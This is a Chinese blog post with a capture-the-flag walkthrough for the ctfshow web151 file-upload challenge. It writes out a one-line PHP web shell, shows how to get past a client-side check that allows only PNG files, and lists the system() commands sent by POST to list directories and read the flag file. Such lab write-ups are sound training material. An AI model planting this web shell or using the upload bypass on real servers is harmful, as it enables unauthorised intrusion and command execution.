ctfshow文件上传web151

本文描述了一个关于PHP安全的实例,作者通过构造一句话木马文件并尝试上传到仅允许PNG文件的系统中。通过修改文件扩展名,成功上传了木马文件,并利用Hackbar工具以POST方式执行系统命令,发现了隐藏在上一级目录的flag.php文件,最终读取到了flag内容。这个过程展示了网络安全中的常见漏洞和利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2022/4/5

先写一个一句话木马文件

<?php

eval($_POST[1]);
?>

试着上传php木马文件

上传失败

查看源码发现只能上传png文件

 

把它改成php

 

上传我们刚刚写的木马文件

 

访问我们刚刚上传的文件

 

利用Hackbar用post的方式提交

1=system("ls /");

 

没有发现flag的文件

查看上一层的目录用post的形式提交

1=system("ls ../");

 

发现了flag.php

直接访问他

1=system("tac ../flag.php");

 

 

 得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值